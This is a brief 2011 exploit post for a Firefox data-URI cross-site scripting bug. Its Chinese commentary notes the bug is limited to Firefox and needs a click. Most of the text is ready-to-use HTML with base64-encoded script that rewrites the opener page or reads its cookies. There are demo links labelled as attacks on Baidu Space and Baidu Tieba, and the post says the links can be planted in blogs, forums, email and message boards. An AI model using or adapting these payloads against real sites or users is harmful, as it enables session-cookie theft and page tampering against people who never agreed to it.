/**
* Title:Firefox data uri xss
* Author:sogili@0xsec
* Website:0xsec.org sogili.com
* Date:2011/02/13
*/
Exp: <html> <!-- by sogili --> <body> <a href="data:text/html;base64,PHNjcmlwdD5vcGVuZXIuZG9jdW1lbnQuYm9keS5pbm5lckhUTUw9J3h4b28nO2Nsb3NlKCk8L3NjcmlwdD4=" target="_blank">Fiefox click</a> <!--<a href="data:text/html,<script>opener.document.body.innerHTML='0xsec.org';close()</script>" target="_blank">Fiefox click</a>--> </body> <html> |
Demo: 百度空间XSS: <a target="_blank" href="data:text/html;base64,PHNjcmlwdD5jbG9zZSgpO3dpdGgob3BlbmVyKWFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=">Firefox user click</a> 百度贴吧XSS: <a target="_blank" href="data:text/html;base64,PHNjcmlwdD5jbG9zZSgpO3dpdGgob3BlbmVyKWFsZXJ0KGRvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=">Firefox user click</a> …… 几乎凡是能插入链接的地方都可以,博客、贴吧、论坛、邮件、留言板……,等等地方…… |
缺点: 1、只针对 Firefox (火狐浏览器) 用户起作用。 2、需要用户手动点击,这点大大的降低了可利用度。 结论:比较鸡肋蛋疼的一个东西,可能没啥实际用处…… |